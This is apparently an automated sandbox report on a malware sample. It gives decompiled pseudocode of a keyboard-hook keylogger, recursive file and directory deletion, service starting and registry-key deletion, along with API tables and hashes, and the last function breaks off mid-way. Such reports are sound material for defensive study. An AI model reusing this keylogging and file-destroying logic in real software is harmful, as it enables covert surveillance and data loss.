				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465918; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E004176DE( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E00417754( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x00417768
0x0041776b
0x0041776d
0x0041776f
0x0041776f
0x00417772
0x00417776
0x00417779
0x00417784
0x00417789
0x00417789
0x0041778d
0x00417790
0x00417795
0x004177a0
0x004177a2
0x004177a4
0x004177aa
0x004177ae
0x004177b0
0x004177b0
0x004177b3
0x004177b7
0x004177ba
0x004177c5
0x004177ca
0x004177ca
0x004177ce
0x004177d1
0x004177d6
0x004177db
0x004177f1
0x004177f6
0x0041793e
0x00000000
0x0041793e
0x004177fc
0x004177fe
0x004177fe
0x00417806
0x00417809
0x00417811
0x00417816
0x0041781a
0x0041782a
0x0041792e
0x00417937
0x00417938
0x00000000
0x00417938
0x00417930
0x00417932
0x00000000
0x00417932
0x0041783d
0x004178be
0x004178be
0x00000000
0x004178be
0x0041783f
0x00417847
0x00417849
0x00417849
0x0041784c
0x0041784f
0x0041785a
0x0041785c
0x0041785f
0x0041785f
0x00417863
0x00417866
0x0041786d
0x00417870
0x0041787e
0x0041787e
0x00417880
0x004178e2
0x004178f0
0x004178f0
0x00417905
0x00000000
0x00417907
0x00417909
0x0041790b
0x0041790b
0x00417913
0x00417916
0x0041791e
0x00000000
0x00417923
0x00417905
0x0041788f
0x00000000
0x00000000
0x0041789c
0x004178a4
0x004178a6
0x004178a6
0x004178ae
0x004178b1
0x004178b9
0x00000000
0x004178c1
0x004178c1
0x004178ca
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98

Uniqueness

Uniqueness Score: -1.00%

Function 10599700, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10599700(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, 0x40887b, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E105A8094(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E10598430(_t22, _t38 - 0x18, 0x45f968, 0, _t43, _t16);
						E10592EF2(_t22, _t39 - 0x14, 0x45f4f8);
						E105A7AEE(_t22, 0);
						E10592E35();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x10599706
0x1059970a
0x1059970f
0x10599717
0x00000000
0x10599719
0x10599729
0x1059972f
0x10599731
0x10599733
0x1059977b
0x1059977b
0x10599783
0x10599789
0x1059978b
0x00000000
0x00000000
0x10599792
0x1059979d
0x105997a3
0x105997a5
0x00000000
0x00000000
0x00000000
0x105997a5
0x105997a7
0x105997a7
0x10599735
0x10599741
0x10599746
0x10599751
0x10599760
0x10599765
0x10599771
0x10599778
0x10599778
0x10599733
0x105997ae

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1059971B
SetWindowsHookExA.USER32(0000000D,0040887B,00000000), ref: 10599729
GetLastError.KERNEL32 ref: 10599735

Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10599783
TranslateMessage.USER32(?), ref: 10599792
DispatchMessageA.USER32(?), ref: 1059979D

Strings

Keylogger initialization failure: error , xrefs: 10599749

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: f0dad1ed782043a170cd86187b4b1af230c9afc34384db41e4132afb83737165
Instruction ID: 547a65e31f3447aea98685ba776a59df2a52692eb30be578e93fe0d8ad0ca4f9
Opcode Fuzzy Hash: f0dad1ed782043a170cd86187b4b1af230c9afc34384db41e4132afb83737165
Instruction Fuzzy Hash: 73118F75614242ABC3006FB99C0D86B7BFCEBC6692B50053DF896C2150EF30D604C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004163AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004163AD(char _a4) {
				void* _t5;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t1 =  &_a4; // 0x416033
				_t18 = _t5;
				_t17 = OpenServiceW(_t18, E00401EEB(_t1), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00401EF0();
				return _t14;
			}

0x004163b5
0x004163b9
0x004163c1
0x004163c4
0x004163d3
0x004163d7
0x004163f4
0x004163f7
0x004163fa
0x004163d9
0x004163da
0x004163da
0x004163ff
0x0041640a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA

Strings

3`A, xrefs: 004163C1, 004163FC

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID: 3`A
API String ID: 276877138-3175782522
Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9

Uniqueness

Uniqueness Score: -1.00%

Function 1059AE80, Relevance: 12.2, APIs: 8, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E1059AE80(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E10592F43(__ebx,  &_v100);
				E10592F43(__ebx,  &_v76);
				E10592F43(__ebx,  &_v28);
				_t45 = E10592EF2(_t89,  &_v124, 0x45fd34);
				E10592E3F( &_v28, _t46, _t135, E10598430(_t89,  &_v52, E105CA6F8(_t89, __eflags, 0x45fc64), _t134, _t142, _t45));
				E10592E35();
				E10592E35();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E10592E03(E105983C6( &_v124,  &_v28, _t142, 0x45fc24)),  &_v468);
				E10592E35();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								__eflags = _t58 -  *((intOrPtr*)(0x45fd84 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(0x45fd84 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E10592E3F( &_v100, _t61, _t136, E105961B1(_t89,  &_v52, E105983C6( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, 0x45fd88));
									E10592E35();
									E10592E35();
									_t128 = E105983C6( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E10592E3F( &_v76, _t67, _t136, E105961B1(_t89,  &_v148, _t67, _t134, __eflags, 0x45fd98));
									E10592E35();
									E10592E35();
									_t73 = DeleteFileA(E10592E03( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E10592E03( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E10592EF2(_t89, _t137 - 0x18, 0x45fda4);
					E1059B55D(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E10592EF2(_t89, _t137 - 0x18, 0x45fd60);
					E1059B55D(_t89,  &_v28, _t143);
					L17:
					E10592E35();
					E10592E35();
					E10592E35();
					return 1;
				}
			}

0x1059ae80
0x1059ae80
0x1059ae80
0x1059ae8d
0x1059ae95
0x1059ae9d
0x1059aeaa
0x1059aeca
0x1059aed2
0x1059aeda
0x1059aeeb
0x1059af08
0x1059af0a
0x1059af0f
0x1059af12
0x1059b048
0x1059b048
0x1059b056
0x1059b058
0x00000000
0x00000000
0x1059af3b
0x1059af42
0x00000000
0x00000000
0x1059af48
0x1059af4e
0x1059af51
0x1059af5f
0x1059af5f
0x1059af65
0x1059af65
0x1059af67
0x1059af67
0x1059af70
0x1059af73
0x1059af79
0x00000000
0x00000000
0x1059af7b
0x1059af7c
0x1059af7f
0x00000000
0x00000000
0x1059af81
0x1059af8a
0x1059af8a
0x1059af8c
0x1059afbc
0x1059afc4
0x1059afcf
0x1059afec
0x1059affe
0x1059b009
0x1059b011
0x1059b01f
0x1059b025
0x1059b027
0x1059b029
0x1059b029
0x1059b038
0x1059b03e
0x1059b040
0x1059b042
0x1059b042
0x1059b040
0x00000000
0x1059af8c
0x1059af85
0x1059af87
0x1059af87
0x00000000
0x1059af87
0x1059af57
0x1059af59
0x00000000
0x00000000
0x00000000
0x1059af59
0x1059b068
0x1059b06d
0x1059b076
0x00000000
0x1059af18
0x1059af19
0x1059af29
0x1059af2e
0x1059b07c
0x1059b07f
0x1059b087
0x1059b08f
0x1059b09a
0x1059b09a

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0045FD34), ref: 1059AEFF
FindClose.KERNEL32(00000000), ref: 1059AF19
FindNextFileA.KERNEL32(00000000,?), ref: 1059B050
FindClose.KERNEL32(00000000), ref: 1059B076

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 5bb5e788937b6c8f61039caf28d1d2a031d08fad4a54c4f0328ff985a04a4a70
Instruction ID: 13be1a51fce84d4af6a89ac577a7864eb919f1abeae0be0c113752aa32fd8d0d
Opcode Fuzzy Hash: 5bb5e788937b6c8f61039caf28d1d2a031d08fad4a54c4f0328ff985a04a4a70
Instruction Fuzzy Hash: E35191349001595BDB04EB70DC9AAFE7F78EF95382F9000A9F40662191FF746B4DCA92

Uniqueness

Uniqueness Score: -1.00%

Function 1059B09B, Relevance: 12.1, APIs: 8, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1059B09B(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E10592F43(0,  &_v52);
				E10592F43(0,  &_v28);
				_t35 = E10592EF2(0,  &_v100, 0x45fd34);
				E10592E3F( &_v28, _t36, _t109, E10598430(0,  &_v76, E105CA6F8(0, __eflags, 0x45fc64), _t108, _t116, _t35));
				E10592E35();
				E10592E35();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(E10592E03(E105983C6( &_v100,  &_v28, _t116, 0x45fc24)),  &_v444);
				E10592E35();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E10592EF2(0, _t111 - 0x18, 0x45fdc8);
						E1059B55D(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										__eflags = _t56 -  *((intOrPtr*)(0x45fd84 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(0x45fd84 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E105983C6( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E10592E3F( &_v52, _t59, _t110, E105961B1(0,  &_v76, _t59, _t108, __eflags, 0x45fde8));
											E10592E35();
											E10592E35();
											__eflags = DeleteFileA(E10592E03( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push(0x45fdf8);
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push(0x45fdc8);
					L2:
					E10592EF2(0, _t102);
					E1059B55D(0, _t104, _t117);
					L18:
				}
				L19:
				E10592E35();
				E10592E35();
				return 1;
			}

0x1059b09b
0x1059b09b
0x1059b0a9
0x1059b0b1
0x1059b0be
0x1059b0de
0x1059b0e6
0x1059b0ee
0x1059b0ff
0x1059b11c
0x1059b11e
0x1059b123
0x1059b126
0x1059b159
0x1059b15b
0x1059b227
0x1059b231
0x1059b236
0x1059b23f
0x00000000
0x1059b161
0x1059b161
0x1059b163
0x1059b163
0x1059b16a
0x00000000
0x1059b170
0x1059b170
0x1059b176
0x1059b179
0x1059b187
0x1059b187
0x1059b18d
0x1059b18f
0x1059b18f
0x1059b198
0x1059b19b
0x1059b1a1
0x00000000
0x00000000
0x1059b1a3
0x1059b1a4
0x1059b1a7
0x00000000
0x1059b1a9
0x1059b1a9
0x1059b1a9
0x1059b1b2
0x1059b1b2
0x1059b1b4
0x00000000
0x1059b1b6
0x1059b1ce
0x1059b1dd
0x1059b1e5
0x1059b1ed
0x1059b201
0x1059b203
0x1059b26b
0x1059b26d
0x00000000
0x1059b205
0x1059b205
0x1059b20c
0x1059b20f
0x1059b260
0x00000000
0x00000000
0x00000000
0x1059b20f
0x1059b203
0x00000000
0x1059b1b4
0x1059b1ad
0x1059b1af
0x1059b1af
0x00000000
0x1059b17b
0x1059b17f
0x1059b181
0x00000000
0x00000000
0x00000000
0x00000000
0x1059b181
0x1059b179
0x00000000
0x1059b211
0x1059b21f
0x1059b21f
0x00000000
0x1059b163
0x1059b128
0x1059b129
0x1059b132
0x1059b134
0x1059b139
0x1059b139
0x1059b13e
0x1059b245
0x1059b245
0x1059b247
0x1059b24a
0x1059b252
0x1059b25e

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0045FD34), ref: 1059B113
FindClose.KERNEL32(00000000), ref: 1059B129
FindNextFileA.KERNEL32(00000000,?), ref: 1059B153
DeleteFileA.KERNEL32(00000000,00000000), ref: 1059B1FB
GetLastError.KERNEL32 ref: 1059B205
FindNextFileA.KERNEL32(00000000,00000010), ref: 1059B219
FindClose.KERNEL32(00000000), ref: 1059B23F
FindClose.KERNEL32(00000000), ref: 1059B260

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID:
API String ID: 532992503-0
Opcode ID: f8bd42b83f37baca371e5719e5b32f5f22c1263342ce782499c62eadd2d69499
Instruction ID: cd20c419ec5d182672dffc60be78931a74d21a02de86b2b8deb12530481f8b87
Opcode Fuzzy Hash: f8bd42b83f37baca371e5719e5b32f5f22c1263342ce782499c62eadd2d69499
Instruction Fuzzy Hash: 6641B5349002595BEB04EB74DD9A9FE7F79EF55282F9001A9F40292191EF306B4DC791

Uniqueness

Uniqueness Score: -1.00%

Function 00411205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479
registrylibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00411205(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = E00401F95( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E004042A6( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E004020EC(_t203, _t351, __edx, _t379, 0x46c238);
				_t352 = _t351 - 0x18;
				E004020EC(_t203, _t352, __edx, _t379,  &_v68);
				E00417478( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					E00401F6D(_t203,  &_v76);
					__eflags = E004021F5( &_v88) - 1;
					if(__eflags > 0) {
						E00409DC9(_t203,  &_v80, E00401F95(E00401E49( &_v88, _t320, __eflags, 1)));
					}
					E004020EC(_t203, _t353 - 0x18, _t320, __eflags, E00401E49( &_v88, _t320, __eflags, 0));
					_t88 = E00401EEB( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00411046(_t217, _t320, _t386);
					L38:
					E00401EF0();
					L39:
					E00401E74( &_v88, _t320);
					E00401FC7();
					E00401FC7();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = E00401F95(E00401E49( &_v88, __edx, __eflags, 2));
					_t101 = E00401F95(E00401E49( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = E00401E49( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E004020EC(_t203, _t356, _t320, __eflags, _t102);
					_t104 = E00410FB5(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = E00410D5C(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00402084(_t203, _t233);
						E00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00402084(_t203, _t233);
					E00404AA4(_t203, 0x46c700, _t320, __eflags);
					E004020EC(_t203, _t358 - 0x18, _t320, __eflags, E00401E49( &_v120, _t320, __eflags, _t330));
					_t113 = E00401F95(E00401E49( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00411046(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E0040427F(_t203,  &_v80, E00401F95(E00401E49( &_v88, __edx, __eflags, 1)));
					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = E00401EEB( &_v84);
					_t121 = E00401E49( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E004020EC(_t203, _t361, _t320, __eflags, _t121);
					_t123 = E00410FB5(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x46bd64(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00402084(_t203, _t247);
						E00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L38;
					}
					_t127 = E00402489();
					_t340 = 2;
					_t203 = E0041184C( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = E0042F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = E00401EEB(E00407309( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						E00401EF0();
						_t137 = E00401E49( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E004020EC(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00411046(_t203, 0, 0);
						E0042F4CF(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = E00401E49( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E004020EC(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00411046(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t146 = E00436769(_t144, E00401F95(E00401E49( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(E00401F95(E00401E49( &_v92, __edx, __eflags, _t328)))));
						_t150 = E00401F95(E00401E49( &_v92, __edx, __eflags, 2));
						_t152 = E00401F95(E00401E49( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = E00401E49( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E004020EC(_t203, _t368, _t320, __eflags, _t153);
						_t155 = E00410FB5(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
